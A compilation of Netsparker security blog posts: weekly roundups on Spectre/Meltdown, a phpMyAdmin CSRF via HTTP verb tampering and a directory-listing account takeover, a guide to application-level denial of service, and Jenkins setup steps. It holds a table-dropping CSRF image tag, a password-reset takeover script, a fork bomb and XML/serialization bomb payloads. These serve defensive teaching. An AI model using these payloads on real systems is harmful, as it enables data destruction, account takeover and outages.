
Netsparker's Weekly Security Roundup 2018 – Week 01


Table of Contents

  1. The Impact of Meltdown and Spectre On the Web
  2. HTTP Verb Tampering and a phpMyAdmin Cross-Site Request Forgery

The Impact of Meltdown and Spectre On the Web

In January 2018, two high-profile vulnerabilities in modern processors were disclosed on spectreattack.com. They were given the names Spectre and Meltdown. The researchers who discovered them worked at Google's Project Zero, various universities and even a private IT security company.

Both vulnerabilities are caused by problems that arise due to the use of speculative execution, a technique modern processors employ for performance improvements. The impact of both is devastating. They enable the theft of sensitive data, passwords and encryption keys from the memory of affected systems.

One major problem with these security flaws is that attackers can use them to read sensitive system memory, even if the code is executed inside a virtual machine (VM) or a sandboxed environment. This is why many companies are concerned about the sensitive applications they host in the cloud. If attackers manage to run code on the same server, which is often the case in shared environments, they can steal encryption keys and passwords from otherwise secure applications.

However, it turns out that attackers don't actually have to execute a binary on an affected system to abuse the vulnerabilities. They can also be triggered by malicious JavaScript code in a user's browser. This means that any malicious website can read private data from memory.

But it gets worse if you think about the implications. You don't actually have to visit a shady website in order to get hacked. The code may be placed on a web application you regularly visit, if it is vulnerable to stored cross-site scripting (XSS). While the usual goal of XSS is to bypass the same origin policy (SOP), in this case, an attacker wants to reach a variety of users with little effort. That makes stored XSS such an appealing attack vector.

While an attacker can also use reflected XSS, it's less useful in this case. If an attacker can make a user click a suspicious link, he may as well host the payload on his own server. If you own a website, you should take the same precautions as with a classic XSS attack. Use a strong content security policy (CSP) as well as context-dependent encoding in order to make sure that your site's visitors are secure.

HTTP Verb Tampering and a phpMyAdmin Cross-Site Request Forgery

A vulnerability was discovered in phpMyAdmin, a popular database management tool written in PHP that has been in development for about 18 years now. This particular security flaw, found by Ashutosh Barot, affects 4.7.x versions prior to 4.7.6.1/4.7.7. It is a Cross-Site Request Forgery (CSRF) vulnerability that allows an attacker to execute actions on behalf of legitimate users, merely by making them open a malicious link.

In order to understand the vulnerability, it is important to look at the message at the top of the commit that introduced the flaw.

This commit is based on the assumption that GET requests are (correctly) used to execute actions that don't result in a state change. In other words, the GET requests only retrieve data, but do not modify or delete it. It turns out, however, that this wasn't exactly true.

While there was code that checked for matching CSRF tokens sent via POST requests, it didn't take GET requests into account. It just didn't seem necessary for the above-mentioned reasons.

This was a problem, though, since it made HTTP verb tampering possible. What is HTTP verb tampering? Whenever your browser sends a request to a web server, it specifies an HTTP verb.

GET / HTTP/1.1

Here, GET is the verb, / is the path, and HTTP/1.1 is the protocol version.

Applications often decide which action to take based on the HTTP verb. As mentioned already, GET is only designed to retrieve data. For a short period, this was the only available verb. Later, others were added, such as POST, which can be used to change or create data on the server. Other common verbs with different meanings include: PUT, DELETE and OPTIONS.

Sometimes, developers don't check which HTTP verb is used. PHP even has a predefined variable, $_REQUEST, that merges the GET and POST parameters of a request (and possibly cookies, depending on configuration). It is often used when both GET and POST requests should lead to the same action on the server side. This makes it significantly harder to enforce the correct verb, and can easily lead to HTTP verb tampering.

Imagine that there is a CSRF token check that only works when the request method is POST. This example illustrates what such a check might look like:

<?php
session_start();

// The CSRF token is only validated for POST requests.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        // Check if the request carries the token stored in the session
        if ($_POST["token"] !== $_SESSION["csrf_token"]) {
                exit("Invalid token!");
        }
}

// $_REQUEST contains both GET and POST parameters, so a GET request
// reaches this point without ever passing the token check above.
$username = $_REQUEST["username"];
$password = $_REQUEST["password"];
write_user_to_db($username, $password);
?>

The problem is that $_REQUEST doesn't only contain POST parameters; it is also filled for GET requests. This means that for a GET request the CSRF token check never runs, but the rest of the code still does. In this example, HTTP verb tampering bypassed the check.
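
A hedged sketch of a safer variant, reusing the hypothetical write_user_to_db() helper from above: reject non-POST requests for state-changing actions outright, compare tokens with a timing-safe check, and read parameters only from $_POST. Note that hash_equals() requires PHP 5.6+ and the null coalescing operator requires PHP 7.

<?php
session_start();

// Only POST may trigger state changes; everything else is rejected.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit("Method not allowed!");
}

// Timing-safe comparison of the session token and the submitted token.
if (!hash_equals($_SESSION["csrf_token"], $_POST["token"] ?? '')) {
        exit("Invalid token!");
}

// Read parameters from $_POST only, never from $_REQUEST.
$username = $_POST["username"];
$password = $_POST["password"];
write_user_to_db($username, $password); // same hypothetical helper as above
?>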

Applications are vulnerable when these conditions are met:

  • There is a security check for one specific HTTP verb only
  • Requests that use other verbs are not discarded, and their parameters are still processed by the application
  • Additionally, the application may accept arbitrary verbs

There is a similar problem with the phpMyAdmin vulnerability. Whenever a legitimate user clicks Drop Database, the following URL will be called:

http://example.com/pma/sql.php?ajax_request=true&token=b6a6527a5805591d544fb66c84f30faf&server=1&get_default_fk_check_value=true&_nocache=1515335432843146723

As you can see, there is a CSRF token. This request will create a popup, as illustrated, that prompts you to confirm your action.

However, once you click OK, another request is issued. This time it is a POST request, and it will delete the selected table.

The screenshot clearly shows that the application uses a POST request with a CSRF token. What we can do now is simply issue a GET request with the same parameters. If the application is vulnerable to HTTP verb tampering, it will execute the action without validating the CSRF token, since the check only runs for POST requests.

It works. An attacker can carry out this attack with an image tag like this:

<img src="http://example.com/pma/sql.php?db=one&goto=db_structure.php&table=test&reload=1&purge=1&sql_query=DROP+TABLE+%60test%60&message_to_show=something" >

This serious vulnerability was fortunately fixed in the latest version of phpMyAdmin. If you use a version prior to the ones mentioned above, it's time to update your installation.


Netsparker's Weekly Security Roundup 2018 – Week 02


Table of Contents

  1. Directory Listings Can Lead Directly to Account Takeover
  2. Are US Government Websites Accessible and Secure?
  3. AlwaysOnSSL – A New, Free Certification Authority

Directory Listings Can Lead Directly to Account Takeover

Directory listings are one of the most frequently encountered issues in the Information Leak category. They occur when developers fail to properly configure their web servers. As with our other web security warnings, let's not underestimate this one!

This week, we examine an experiment carried out by Nishaanth Guna, a 22-year-old Security Researcher who previously worked with AppKnox and Ernst & Young. Guna has blogged about a straightforward way to use directory listings to achieve account takeover, which he encountered during one of his penetration tests.

He started his penetration test by enumerating the subdomains of his target domain by searching for them in the Certificate Transparency logs. He used the following short and elegant bash script to conveniently query the crt.sh website from his command line:

[nishaanthguna:~/essentials]$ curl --silent https://crt.sh/\?q\=%.domain.com | sed 's/<\/\?[^>]\+>//g' | grep -i domain.com | tail -n +9 | cut -d ">" -f2 | cut -d "<" -f1

This is the list of domains his script returned:

  • www.domain.com
  • blog.domain.com
  • stag.domain.com

Guna performed a port scan of all the domains he found and noticed that one of them had port 8080 exposed. Much to his surprise, the subdomain in question returned a list of directories and files.

One of them was called mailgun-webhook.log and was used by the administrator to store the results of Mailgun's webhook requests. Webhooks are endpoints to which programs or websites can send notifications whenever a specific event occurs. Mailgun can send a notification to a webhook whenever a user clicks a link, when there is a spam complaint or when a user opts out of receiving further emails.

So, what's the problem?

The bad news is that this log file contains not only email addresses, but also password reset links. Guna even wrote a bash script that would extract a password reset link from the log and then automatically set the victim's password to 'testpassword!!'.

#!/bin/bash
# Download the exposed webhook log and keep a local copy
curl --silent https://domain.com/mailgun-webhook.log | tee direct.txt

if grep -Fq "reset" direct.txt; then
 echo "[+] Found a password reset link"
 # Extract the first reset link from the log
 link=$(grep -i reset direct.txt | cut -d "," -f6 | cut -d "\\" -f1 | head -n 1)
 # Follow the link and set the victim's password
 curl "$link" -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6)' \
 --data 'password=testpassword%21%21&confirmation=testpassword%21%21' --compressed
 echo "[+] Password changed to testpassword!!"
else
 echo "[-] Reset link not found"
fi

Our recommendation is that you turn off the Directory listing feature, and move log files that contain sensitive data out of the public directory (for the reasons illustrated in Guna's experiment).

For further information on Guna's security research, see Directory Listing to Account Takeover.

Are US Government Websites Accessible and Secure?

A report published by the Information Technology and Innovation Foundation (ITIF) in November 2017 found that 91% of websites used to access US information and services had speed and connection issues, and lacked both a user-friendly mobile interface and basic security precautions. The report was based on an examination of 4,500 websites across 400 different domains, including the 500 most popular websites.

In March the same year, they published their research on the 300 most popular websites. The results highlighted that many government websites are slow, lack a user-friendly mobile interface, and suffer from accessibility problems and security issues.

By the time the November report was published, ITIF was able to measure the progress made on those 300 government sites. Their findings were as follows:

  • Their security investigation was based on only two criteria: DNSSEC and HTTPS implementation. They found that 71% of the sites passed the SSL implementation test, an increase from the 67% reported in March.
  • Eighty percent of the sites were DNSSEC-enabled, a decline from the 90% reported in March.
  • The Majestic Million index was used instead of the Alexa Top list. While Alexa collects data from the Alexa Toolbar, Majestic Million (a reverse search engine) bases its rankings on backlinks (https://majestic.com/reports/majestic-million).
  • According to the report, 70% of the government sites included in the research used SSL, while 8% did not. In addition, they found that older, insecure versions such as SSLv3 were still in use, that cryptographic attacks such as POODLE and DROWN were possible, and that some sites did not use perfect forward secrecy.

For further information about this research, see Benchmarking US Government Websites.

AlwaysOnSSL – A New, Free Certification Authority

We're all familiar with Let's Encrypt, a certificate authority (CA) that provides free TLS certificates and has played an important role in the increase of secure connections. A new CA called AlwaysOnSSL now offers free TLS certificates as well. AlwaysOnSSL is provided by CertCenter, a company based in Germany that also sells Symantec and DigiCert certificates.

So, what's the difference between the two?

  • At first glance, the most noticeable difference is that Let's Encrypt signs certificates for a period of three months, while AlwaysOnSSL signs certificates for up to 12 months.
  • Let's Encrypt does not offer a way to create certificates from a web interface; this is only possible via third-party services built on top of Let's Encrypt, such as https://www.sslforfree.com/. With AlwaysOnSSL, you can easily create certificates from the website.
  • It's important to note that AlwaysOnSSL offers an option to create private keys via its web UI, whereas with Let's Encrypt this process is carried out on the client side. Creating a private key on a third-party service is risky. However, the option to upload your own Certificate Signing Request (CSR) file has recently been added to AlwaysOnSSL. Ownership is verified via a DNS entry or a file upload, the same methods used by other services. When choosing the DNS entry option, you have to create a TXT record in the domain's DNS. Once the necessary conditions are met, signing happens within minutes.

Application Level Denial of Service – A Comprehensive Guide


Denial of Service attacks that bring down popular websites often involve thousands of hacked consumer devices and servers. While these attacks mainly aim to overwhelm the target system with traffic, in order to deny service to legitimate users, bugs at the Application Layer (Layer 7 in the OSI model) can have the same effect.

Application Level Denial of Service (L7 DoS) errors are often tough to identify and sometimes even tougher to prevent. This guide aims to highlight the different techniques that will help you find out what to look for and where DoS conditions may occur.

Table of Contents

  1. Random Access Memory (RAM)
      1. Recursion
      2. Tricking an Application Into Allocating a Huge Amount of Memory
      3. Other
  2. Central Processing Unit (CPU)
      1. Recursion
      2. Abusing Resource-Intensive Operations
  3. Disk Space
  4. Exhaust Allocated Resources for a Single User
  5. Logic-Based Denial of Service
  6. Basic Tips and Tricks to Identify & Prevent Application DoS Attacks

    Random Access Memory (RAM)

    In order to function properly, applications need a certain amount of available RAM. While it's possible to deal with the system not being able to allocate new memory, most of the time the application will either hang or crash, both of which will result in a DoS scenario.

    Recursion

    Recursion is a common reason for L7 DoS attacks. It refers to a procedure that causes itself to repeat over and over again. In most cases, this is a controlled process and a valid technique in programming. However, in the case of L7 DoS, it's the result of a small set of instructions whose execution prompts vulnerable applications to enter a resource-intensive loop, with the specific purpose of exhausting their resources.

    The following examples involve a system's volatile memory.

    Recursive File Inclusion

    What to look out for

    Here is an example of PHP code:

    // The script includes itself, recursing until PHP runs out of memory
    include('current_file_name.php');

    PHP allocates new memory for each inclusion, and repeats the process until there is no memory left. When running the code in Command Line Interface (CLI) mode, there is no check to break this loop. However, mod_php for Apache has a safety switch that aborts script execution if it detects too many repetitions, and throws an internal server error. Even so, a multithreaded script running on a single machine can query the page repeatedly, leading to the same end result – PHP running out of memory. This behaviour may also apply to other programming languages.

    Where it is found

    This kind of vulnerability can be found in places where a traditional Local File Inclusion (LFI) vulnerability might occur. However, because it requires neither directory traversal nor control over the file extension, it can even affect otherwise non-exploitable LFIs.

    Zip Bombs

    What to look out for

    In the early 2000s, ZIP bombs were emailed to unsuspecting victims in order to crash their personal computers or mail servers. Ironically, this was often the fault of the system's antivirus program automatically extracting the archive (in order to scan it), not that of the user opening it. Now, most antivirus vendors either detect ZIP bombs or avoid extracting them completely.

    Briefly, some file compression algorithms work by replacing recurring patterns in a file with short references to a single occurrence of the pattern. Let's say that instead of writing 'AAAAAAAAAAAAAAAA', you could write '1-16-A' to represent the character 'A' sixteen times at position 1. Replace '16' with '999999999', and you'll understand why a relatively small file can consume all the RAM or disk space once extracted. One famous example of a ZIP bomb is 42.zip, which is just 42 KB in size, but inflates to 4.5 petabytes (approximately the size of 1.125 billion MP3 files). Even though it is called a ZIP bomb, the same trick can be applied to similar archive formats.

    Where it is found

    Web applications that allow you to upload compressed files, and extract the content for you, might be susceptible to such an attack, particularly if the application (or the library that handles the decompression) fails to conduct a proper inspection of the deflated file. A defensive check is sketched below.
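
    As a rough illustration, here is a minimal PHP sketch of such an inspection using the standard ZipArchive class. It checks each entry's declared uncompressed size before extracting; the 100 MB ceiling and file names are assumptions, and a malicious archive can still hide further archives inside, so treat this as a first line of defense only.

    <?php
    $maxTotal = 100 * 1024 * 1024; // assumed 100 MB ceiling for the whole archive
    $zip = new ZipArchive();
    if ($zip->open('upload.zip') !== true) {
        exit('Cannot open archive.');
    }
    $total = 0;
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $stat = $zip->statIndex($i);
        $total += $stat['size']; // declared uncompressed size of this entry
        if ($total > $maxTotal) {
            exit('Archive inflates beyond the allowed limit.');
        }
    }
    $zip->extractTo('/tmp/extracted');
    ?>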

    Billion Laughs Attack

    What to look out for

    This attack is a classic example of a relatively small set of instructions that leads to the generation of a massive amount of data once it is parsed. This is how it works. First, a single entity is created. In most available examples, it's called lol and its sole content is the word 'lol'. Then another entity is created, called lol1. This entity contains ten references to the first lol entity. The entity lol2 contains ten references to lol1, and so on. This is repeated several times. If the parser expands all the entities, the result reaches a size of 10^9 'lols' – one billion laughs.
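
    The classic payload looks roughly like this (shortened here; the full version defines entities up to lol9, each containing ten references to the previous one):

    <?xml version="1.0"?>
    <!DOCTYPE lolz [
      <!ENTITY lol "lol">
      <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
      <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
      <!-- ... entities lol3 through lol9 follow the same pattern ... -->
    ]>
    <lolz>&lol9;</lolz>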

    Where it is found

    You may encounter this vulnerability wherever an application accepts input formatted as XML and parses it on the server side. Various examples are available online, one of them on the linked Wikipedia page.

    Tricking an Application Into Allocating a Huge Amount of Memory

    Sometimes applications can decide how much memory they need to allocate just by looking at file headers or serialized strings. If an attacker manages to manipulate these indicators, the application can be tricked into allocating large chunks of memory with very little effort.

    Deserialization Vulnerabilities

    What to look out for

    Deserialization is a delicate topic, and you should generally not deserialize user-supplied input with functions that are not explicitly recommended as safe alternatives to raw deserialization functions. However, depending on their implementation, even those functions may contain bugs that lead to a DoS condition. It might be possible to pass a string to a deserialization function that instructs the parser to allocate large chunks of memory (for example by using repeating nested array definitions, as seen in the linked paper about various PHP vulnerabilities). A wide range of programming languages with similar functionality, in addition to PHP, can be vulnerable.
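
    As a hedged illustration (the payloads in the linked paper differ in detail), a serialized PHP string can nest arrays so that a few kilobytes of input expand into a large number of allocations when parsed:

    <?php
    // Each nesting level forces the parser to allocate another array,
    // so deep nesting amplifies a tiny input. Never unserialize() user input.
    // Newer PHP versions cap the nesting depth via unserialize_max_depth.
    $payload = str_repeat('a:1:{i:0;', 1000) . 'i:1;' . str_repeat('}', 1000);
    $data = unserialize($payload);
    ?>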

    Where it is found

    Deserialization vulnerabilities may be found everywhere user input is accepted. Most of the time you can see where serialized strings are accepted by using the application normally and intercepting the traffic with a tool like Fiddler.

    Manipulating File Headers to Allocate Large Memory Chunks

    What to look out for

    The HackerOne example illustrates a hacker manipulating file headers to allocate large memory chunks. Using a 260px * 260px jpg file, the researcher manipulated the file header in order to make it appear as if the image was 64250px * 64250px in size. This relatively small file eventually led to a DoS condition on HackerOne, and apparently on the researcher's local image viewer. This happened because the application allocated a large amount of memory, ran out of RAM, swapped to disk and eventually denied service altogether.

    Where it is found

    This vulnerability might be found in places where computation is performed on an input file, and where the size of the file is saved in its header. This might include images and video files, and other file formats.

    Other

    Reading Infinite Data Streams

    What to look out for

    Reading infinite data streams using an LFI can create a DoS condition when there is no check on the maximum readable amount of data. On Linux, the first choice for a data source would be either /dev/zero (an infinite stream of NULL bytes) or /dev/urandom (an infinite stream of random data). In both cases, enough memory would be allocated to crash the application.
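
    A minimal sketch of the vulnerable pattern, with a hypothetical 'page' parameter under the attacker's control:

    <?php
    // Requesting ?page=/dev/zero makes PHP read an endless stream of
    // NUL bytes into memory until the process hits its memory limit.
    echo file_get_contents($_GET['page']);
    ?>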

    Where it is found

    This vulnerability can be found in places where a user can specify which data is read, either from the file system or from a remote server. As mentioned above, on a local Linux system, /dev/zero or /dev/urandom are the preferred options. For remote files, this 1TB speed test file is a suitable target.

    Central Processing Unit (CPU)

    The CPU is responsible for the execution of the instructions you write into your program. Depending on the task, the CPU may have relatively little work to do; alternatively, it may require large amounts of computing power. Work-intensive tasks may even tie up all of the CPU's resources and render the system unresponsive.

    Recursion

    Recursion is not only a matter of RAM. If the CPU is forced to repeat a resource-intensive task, it will stop responding to subsequent requests until the task is finished. There are a few attacks that abuse this fact.

    reDoS

    What to look out for

    reDoS (Regular Expression Denial of Service) was put under the spotlight in 2016 when it caused stackoverflow.com to go offline for just over 30 minutes. It wasn't the fault of an attacker, but of a user who included 20,000 whitespace characters in a code snippet. According to the write-up, the regular expression was written in such a way that it forced the system to check the 20,000 character string in 200,010,000 steps (20,000 + 19,999 + … + 2 + 1). There are more details in both the OWASP page and the Stack Overflow blog post, but other sites also provide a useful examination of the issue.
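
    As a hedged, self-contained illustration of catastrophic backtracking (not the exact Stack Overflow regex), consider this PHP snippet:

    <?php
    // Nested quantifiers let the engine try exponentially many ways to split
    // the input, and the trailing '!' guarantees that every attempt fails.
    $input = str_repeat('a', 30) . '!';
    var_dump(preg_match('/^(a+)+$/', $input));
    // PHP aborts the match once pcre.backtrack_limit is reached; engines or
    // configurations without such a limit can hang for a very long time.
    ?>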

    Where it is found

    If a web application allows you to input your own regex code, it might be possible to execute the above-mentioned attack. In older versions of PHP, it might even lead to remote code execution.

    SQL Injection Wildcard Attack

    What to look out for

    An SQL injection wildcard attack works in a similar way to a plain reDoS. The key difference is that it doesn't just use the usual regular expression syntax, but employs so-called 'wildcards' that are used by databases to find data matching a specific description. These attacks can either be carried out using an (otherwise not vulnerable) search functionality, or via an attack vector, where it's possible to execute SQL statements, for example with an existing SQL injection vulnerability.

    Where it is found

    Due to the nature of the vulnerability and the affected SQL functions, it can often be found in search functionality. To learn more about how such attacks are conducted, see the linked paper.

    Fork Bombs

    What to look out for

    Fork bombs are processes that duplicate themselves over and over again until they use up all of the system's resources. Both the CPU and the process table are affected. They acquired their name from the fork system call that they use. Perhaps the best-known fork bomb is the following shell command: :(){ :|:& };:. Fork bombs, too, rely on recursion, since the function named : calls itself over and over again. They are rarely used in web application attacks.

    Where it is found

    This attack would be conducted in a sandboxed environment that allows code execution of some sort, without giving an attacker access to sensitive data. Otherwise an attacker might decide to use the code execution for malicious purposes that are worse than a Denial of Service attack.

    Abusing Resource-Intensive Operations

    It is often possible for a user to instruct the server to execute a resource-intensive set of instructions. These don't necessarily involve recursion. Instead, they are often CPU-hungry operations that are either deliberately designed to be slow or simply require a large amount of computing power.

    Abusing Password Hashing Functions

    What to look out for

    Why would anyone purposefully design a set of instructions that takes a long time to execute and requires a lot of computing power? Modern password hashing functions are a prime example. They are deliberately made expensive through so-called 'key stretching': they need a lot of time and resources to return the desired output. This is intentional, because it slows down attackers who are trying to recover the passwords belonging to stolen hashes. This property distinguishes these algorithms from general-purpose hash functions, which are designed to return checksums for large files quickly.

    Where it is found

    Attackers can abuse this fact to achieve a DoS by submitting a huge number of long passwords to the hashing function. Depending on the cost factor and the server hardware, this can easily lead to a DoS, as the sketch below suggests.
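
    A minimal PHP sketch to get a feel for the cost involved (the cost values are illustrative):

    <?php
    // Each +1 on the bcrypt cost factor roughly doubles the CPU time needed,
    // so a flood of hashing requests quickly saturates a server.
    foreach ([10, 12, 14] as $cost) {
        $start = microtime(true);
        password_hash('correct horse battery staple', PASSWORD_BCRYPT, ['cost' => $cost]);
        printf("cost %d: %.2f seconds\n", $cost, microtime(true) - $start);
    }
    ?>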

    Headless Browser SSRF

    What to look out for

    Headless browsers are sometimes used to visit user-supplied websites and easily render the DOM, in order to take a screenshot of the page that was submitted. There are several vulnerabilities that can arise when using such a setup, such as the disclosure of local file contents or a classical Server Side Request Forgery vulnerability that allows interaction with services behind your firewall. But even if those obvious flaws are considered, it is still possible to exhaust the server's resources by instructing it to parse JavaScript code that was placed on your website. This might lead to a DoS condition.

    Where it is found

    Code that leads to a high CPU load might be JavaScript-specific reDoS or even cryptocurrency mining, the latter being limited by the hardware in use and connection timeouts.

    Disk Space

    Most programs need more than simply a CPU and volatile memory in order to operate. They also need to be able to write to disk so that they can store information. The generated files are used for caching, for configuration, or for swapping data out of RAM when memory is tight. If the disk fills up, programs may crash or act unpredictably, and whole systems can become unstable.

    Uploading Large Files

    What to look out for

    Arguably the most obvious way to fill a system with data is by uploading large files to the server. If the application doesn't apply proper rate-limiting and size checks for its file upload functionality, an attacker can upload random junk data to the system until it can no longer store any more data. This either makes the file upload functionality fail for legitimate users, or can make the entire system unstable.
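
    A minimal defensive sketch of such a size check in PHP; the 5 MB limit, field name and upload directory are assumptions:

    <?php
    $maxBytes = 5 * 1024 * 1024; // assumed per-file limit
    if (!isset($_FILES['upload']) || $_FILES['upload']['error'] !== UPLOAD_ERR_OK) {
        exit('Upload failed.');
    }
    if ($_FILES['upload']['size'] > $maxBytes) {
        exit('File too large.');
    }
    // Per-user quotas and rate limits would be enforced here as well.
    move_uploaded_file($_FILES['upload']['tmp_name'],
        '/var/uploads/' . basename($_FILES['upload']['name']));
    ?>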

    Where it is found

    Profile picture upload functionality, while ubiquitous, is fortunately unsuitable for this type of attack because previous uploads are deleted once a user uploads a new image. Instead, this can be achieved by uploading files in private messages or in bug reports or help desk applications.

    Generating a Huge Amount of Databases or Log Files

    What to look out for

    In the early days of non-relational databases, NoSQL injections could easily be used to execute arbitrary JavaScript on the vulnerable server. Nowadays, the available JavaScript functions are greatly reduced and run in a sandboxed environment. Nonetheless, it's still possible to wreak havoc with the whitelisted JavaScript functions, should an attacker achieve code execution. One option is to use one of the above-mentioned techniques to exhaust all the available RAM, or to use reDoS to bind all the available CPU resources. It's also possible to write into databases or log files using server-side JavaScript, which generates a huge amount of data if an attacker writes in a continuous loop.

    Where it is found

    Often this attack can be conducted either by directly searching for server-side JavaScript injections or by using features such as MongoDB's $where, as in the hedged sketch below.
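
    This sketch uses the PHP MongoDB library with a hypothetical database and collection; if user input reaches the $where clause, an attacker can submit JavaScript that never terminates:

    <?php
    // Requires the mongodb extension and the mongodb/mongodb library.
    $client = new MongoDB\Client('mongodb://127.0.0.1');
    $users  = $client->app->users; // hypothetical database and collection
    // The injected function loops forever, tying up server-side evaluation.
    $cursor = $users->find(['$where' => 'function() { while (true) {} return true; }']);
    ?>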

    Arbitrary File Deletion

    What to look out for

    The deletion of arbitrary files is a completely different DoS approach. Using an arbitrary file deletion vulnerability, an attacker can remove data that the application needs in order to work correctly. This may include removing configuration files or even script code in order to deny service to legitimate users.

    Where it is found

    Where to find such a vulnerability is highly application-specific. But it often involves directory traversal.

    Exhaust Allocated Resources for a Single User

    On applications or services that serve multiple users, resources are limited and have to be allocated in a fair way, so each user can only use a certain amount of the available space. It's easy for attackers to fill that space and thereby deny service to one specific user.

    Email Bomb

    What to look out for

    Users are regularly allocated a small amount of space for their inbox. The goal of an Email Bomb is to flood a user's inbox to the point where all available space is exhausted, and subsequent (legitimate) emails bounce.

    Where it is found

    Attackers can abuse this flaw by sending a moderately large number of emails with large attachments. After a short time, the mailbox is full and new emails are rejected. While it is easy to fill a victim's inbox if space is tight, there is an attack called List Linking that works against targets with larger inboxes: an attacker subscribes the victim to various high-frequency mailing lists and lets them flood the inbox.

    Free Website Restrictions

    What to look out for

    Some web hosts allow only a certain number of requests per day for users on free subscriptions. If the number of requests exceeds the maximum limit, the page becomes unavailable for a certain amount of time, unless the owner pays for a subscription.

    Where it is found

    It is relatively easy to trigger this maximum limit by querying the site in a continuous loop, using a tool like cURL. Only two lines are needed to create a valid HTTP/1.1 request:
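
    GET / HTTP/1.1
    Host: example.com

    The request line carries the verb, path and protocol version, and Host is the only header that HTTP/1.1 strictly requires.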

    Cash Overflow

    What to look out for

    A similar approach is called Cash Overflow. Instead of targeting disk space, RAM or the CPU, the attack aims to raise the bill for a service up to the point where it exceeds the allocated amount of money. Should the owner of the website be unable to pay the bill or if automatic payment fails, the service will be terminated – effectively leading to DoS. This can happen if an external service is used that bills the user a certain amount of money per request.

    Where it is found

    Since these requests are generally inexpensive, an attacker needs to generate huge amounts of traffic in order to achieve DoS.

    Logic-Based Denial of Service

    A DoS for specific users might have legitimate reasons – either to enforce rate limiting or to deny access for malicious users. Like every other piece of code, this functionality can contain bugs. And sometimes the application can be tricked into denying service to specific, legitimate users.

    X-Forwarded-For

    What to look out for

    Hackers can use a well-known trick to overcome IP-based rate limiting or blocks if the application incorrectly uses headers like X-Forwarded-For to determine users' IP addresses. It's easy to forget that this flawed implementation also opens the door for a DoS attack, if an attacker supplies the IP address of a legitimate user instead of a random one. Attackers can constantly trigger rate limiting with an X-Forwarded-For header containing the victim's IP address. If victims can't mask or change their IP address, they are denied service for the duration of the attack.
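
    A hedged sketch of the flawed pattern; record_failed_attempt() is a hypothetical rate-limiting helper:

    <?php
    // The client fully controls X-Forwarded-For, so keying bans or rate
    // limits on it lets an attacker exhaust a victim's quota simply by
    // spoofing the victim's address in the header.
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'];
    record_failed_attempt($ip); // hypothetical helper
    ?>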

    Where it is found

    This flaw can be found on any application protected by a web application firewall (WAF), or any application that applies rate limiting, as long as either of these measures determines client IP addresses from the X-Forwarded-For header.

    Web Application Firewalls

    What to look out for

    Many web application firewalls can be configured to block users who send malicious requests for a certain amount of time. Those requests may contain specific special characters, like backticks and single quotes, or blocked keywords such as script and passwd. An attacker can set up a page that makes visitors' browsers send such requests to a WAF-protected website, or in other words, trigger the DoS condition through CSRF. Once the WAF sees the malicious request coming from the victim's IP, it will automatically block that IP for a certain amount of time. The same works if the attacker is able to set a cookie containing a blocked keyword.

    Where it is found

    This can be found wherever a WAF is protecting the application and users are blocked in the event of malicious keyword detection.

    Wasting the Available Password Attempts

    What to look out for

    Preventing attackers from brute-forcing the credentials of legitimate users is difficult. Often this problem is solved using a captcha. But sometimes developers resort to blocking the account after a certain number of wrong login attempts. If an attacker wastes all of the login attempts for a specific user, either accidentally while brute-forcing or on purpose, the affected user will be denied access as well.

    Where it is found

    This vulnerability can arise wherever there is a limited number of password attempts per user, rather than per IP address or session. Sometimes applications will send the victim a link to unblock the account again. This should be tested, to avoid false positives.

    Cookie Bombs

    What to look out for

    If an application endpoint allows the generation of a large number of cookies with different names (a cookie bomb), an attacker can instruct the victim's browser to store and send enough cookies to exceed the allowed request size. This eventually leads to a denial of service condition that can only be fixed by deleting all the malicious cookies.

    Where it is found

    As mentioned above, the application must set cookies with attacker-controlled names in order for this to work. The attack would be triggered via CSRF, as the sketch below suggests.
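
    A hedged sketch of a vulnerable endpoint; the 'pref' parameter name is hypothetical:

    <?php
    // Because the cookie *name* is user-controlled, requests such as
    // ?pref=c1, ?pref=c2, ... ?pref=c9999 (triggered via CSRF) mint an
    // unbounded number of distinct, long-lived cookies. Once the combined
    // Cookie header exceeds the server's request size limit, every request
    // from the victim's browser is rejected.
    setcookie($_GET['pref'], str_repeat('x', 4000), time() + 31536000, '/');
    ?>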

    Basic Tips and Tricks to Identify & Prevent Application DoS Attacks

    • You don't generally need to receive the responses to your requests when conducting a DoS attack. If you want to test for Denial of Service conditions yourself, we recommend that you use HEAD instead of GET requests where possible, or use the Range header with a value of 'bytes=0-0'.
    • Certain methods of error handling are resource-intensive. If you encounter a verbose error, this might indicate that a large amount of computing power is involved. For example, generating stack traces is known to be resource-intensive.
    • A small amount of input that leads to an exceptionally large return value is always a good place to look for DoS, especially if recursion is involved.
    • Whenever you encounter a DoS flaw, you should consider whether this is the worst impact the vulnerability might have. If there is a Local File Inclusion, try to read sensitive information rather than creating a DoS. And if you can issue a limited set of commands, try to escape from the sandbox and turn it into a full RCE instead of wasting the system's resources. This helps the developers to whom you report the flaw calculate the risk more accurately. Should you submit your findings to a bug bounty program, it is also likely to lead to a more lucrative payout.

    If we neglected to mention something you think is important, or if you have another idea about where a DoS condition might occur, please tweet us your suggestions and tricks.

    How to Integrate Netsparker with Jenkins


    Jenkins is an open source automation server with a plugin ecosystem that supports the development of software projects. If you already use Jenkins to automate tasks, you can integrate the Netsparker web application security scanner with it. This enables you to automate Netsparker Desktop scans and export Netsparker reports. These automated Netsparker tasks are then displayed in the Jenkins UI.

    This article explains how to run scans automatically and export reports from Netsparker via Jenkins.

    How to Automate Scans and Export Reports From Netsparker via Jenkins
    1. Once you have installed Jenkins, open the Jenkins web user interface. The Jenkins web interface can be reached at: http://127.0.0.1:8080/. This window is displayed.

     2. In the Enter an item name field, type your project name.
     3. Select Freestyle project as the type.
     4. Click OK. The Config window is displayed.

     5. Click the Build Environment tab.
     6. From the Add build step dropdown, select Execute Windows batch command. The Execute Windows batch command panel is displayed.

     7. In the Command field, enter the following command:

     cd "C:\Program Files (x86)\Netsparker"
     netsparker.exe /a /url http://php.testsparker.com/ /rt "Detailed Scan Report" /r "C:\Program Files (x86)\Jenkins\workspace\netsparker-scan\report_phptestsparkercom.html"

